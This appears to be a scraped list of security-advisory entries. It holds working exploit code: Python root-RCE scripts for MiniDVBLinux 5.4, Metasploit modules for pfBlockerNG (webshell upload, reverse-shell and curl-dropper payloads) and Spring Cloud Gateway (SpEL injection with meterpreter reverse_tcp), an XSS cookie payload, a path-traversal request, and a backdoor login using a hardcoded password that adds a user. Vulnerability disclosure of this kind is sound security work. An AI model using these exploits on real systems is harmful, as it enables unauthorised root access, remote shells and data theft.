MiniDVBLinux version 5.4 suffers from an OS command execution vulnerability. This can be exploited to execute arbitrary commands as root through the command GET parameter in /tpl/commands.sh.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command execution vulnerability.# This can be exploited to execute arbitrary commands as root, through the# 'command' GET parameter in /tpl/commands.sh.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5718# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php### 24.09.2022#import requestsimport re,sys#test case 002#http://ip:8008/?site=commands&section=system&command=sleep%201;reboot#-#test case 003#http://ip:8008/?site=commands&section=system&command=id#uid=0(root) gid=0(root)if len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Execution PoC')  print('Usage: ./mldhd_root1.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=commands&section=system&command='+cmd)req = requests.get(url+'/?site=commands&section=system&command='+cmd)outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('log\'>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Execution

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

MiniDVBLinux version 5.4 suffers from an OS command injection vulnerability. This can be exploited to execute arbitrary commands with root privileges.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command injection vulnerability.# This can be exploited to execute arbitrary commands with root privileges.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5717# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT#test case 004#http://ip:8008/?site=about&name=blind&file=$(id)#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directory#test case 005#http://ip:8008/?site=about&name=blind&file=`id`#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directoryif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Injection PoC')  print('Usage: ./mldhd_root2.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Injection

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

GNU Privacy Guard 2.3.8

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. This is the LTS release.

GNU Privacy Guard 2.2.40

This Metasploit module leverages a remote shell upload vulnerability in pfSense pfBlockerNG plugin versions 2.1.4_26 and below. Note that version 3.x is unaffected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',        'Description' => %q{          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.        },        'Author' => [          'IHTeam', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'CVE', '2022-31814' ],          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']        ],        'License' => MSF_LICENSE,        'Platform' => 'unix',        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'BSD Dropper',            {              'Platform' => 'bsd',              'Arch' => [ARCH_X64],              'Type' => :bsd_dropper,              'CmdStagerFlavor' => [ 'curl' ],              'DefaultOptions' => {                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 1,        'DisclosureDate' => '2022-09-05',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SERVICE_DOWN ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        OptString.new('WEBSHELL_NAME', [          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil        ])      ]    )  end  def upload_shell    print_status 'Uploading shell...'    if datastore['WEBSHELL_NAME'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"    end    @parameter_name = Rex::Text.rand_text_alpha(4..12)    print_status("Webshell name is: #{@webshell_name}")    web_shell_contents = <<~EOF      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');    EOF    encoded_php = web_shell_contents.unpack('H*')[0].upcase    send_request_raw(      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),      'headers' => {        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"      }    )    sleep datastore['WfsDelay']    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")  end  def check    upload_shell    check_resp = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),      'vars_post' => {        @parameter_name.to_s => 'id'      }    )    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')    Exploit::CheckCode::Vulnerable  end  def execute_command(cmd, _opts = {})    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'headers' => {        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'      },      'vars_post' => {        @parameter_name.to_s => cmd      }    })  end  def exploit    upload_shell unless datastore['AutoCheck']    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :bsd_dropper      execute_cmdstager    end  endend

pfSense pfBlockerNG 2.1.4_26 Shell Upload

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway versions 3.0.0 through 3.0.6 and 3.1.0. The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL expressions to execute code and take control of the victim machine.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Spring Cloud Gateway Remote Code Execution',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway          versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator          endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL          expressions to execute code and take control of the victim machine.        },        'License' => MSF_LICENSE,        'Author' => [          'Ayan Saha'        ],        'References' => [          ['CVE', '2022-22947' ],          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/'],          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22947'],          ['URL', 'https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published']        ],        'Platform' => 'linux',        'Arch' => [ARCH_X64, ARCH_CMD],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',                'RPORT' => 9000              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ],        ],        'DisclosureDate' => '2022-01-26',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )  end  def run_command(cmd)    route_name = Rex::Text.rand_text_alpha(8).downcase    uri = "/actuator/gateway/routes/#{route_name}"    value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}'    data = {      'id' => route_name,      'filters' => [        {          'name' => 'AddResponseHeader',          'args' =>            {              'name' => 'Result',              'value' => value            }        }      ],      'uri' => "http://#{Rex::Text.rand_text_alphanumeric(6..15)}.com"    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri),      'ctype' => 'application/json',      'data' => JSON.generate(data)    })    if res && res.code == 201 && res.message == 'Created'      return route_name    else      return nil    end  end  ## Takes in the command and creates a new route with it on the server  def execute_command(cmd, _opts = {})    route_name = run_command(cmd)    if route_name      refresh      cleanup_route(route_name)    else      return false    end    return true  end  ## Cleaning up the routes created  def cleanup_route(route_name)    uri = "/actuator/gateway/routes/#{route_name}"    res = send_request_cgi({      'method' => 'DELETE',      'uri' => normalize_uri(uri)    })    if res && res.code == 200      print_good('Route deleted')      return true    else      print_error("Couldn't delete route. Might require manual cleanup.")      return false    end  end  def check    print_status('Checking if server is vulnerable')    res = execute_command('whoami')    if res      return Exploit::CheckCode::Vulnerable    else      return Exploit::CheckCode::Safe    end  end  ## Refresh the gateway to trigger the routes with commands created  def refresh    print_status('Triggering code execution using routes')    uri = '/actuator/gateway/refresh'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri)    })  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Spring Cloud Gateway 3.1.0 Remote Code Execution

Gentoo Linux Security Advisory 202210-7 - A vulnerability has been found in Deluge which could result in XSS. Versions less than 2.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Deluge: Cross-Site Scripting  
     Date: October 16, 2022  
     Bugs: #866842  
       ID: 202210-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in Deluge which could result in XSS.

Background  
==========

Deluge is a BitTorrent client.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-p2p/deluge             < 2.1.1                      >= 2.1.1

Description  
===========

Deluge does not sufficiently sanitize crafted torrent file data, leading  
to the application interpreting untrusted data as HTML.

Impact  
======

An attacker can achieve XSS via a crafted torrent file.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Deluge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/deluge-2.1.1"

References  
==========

[ 1 ] CVE-2021-3427  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3427

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-07

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & 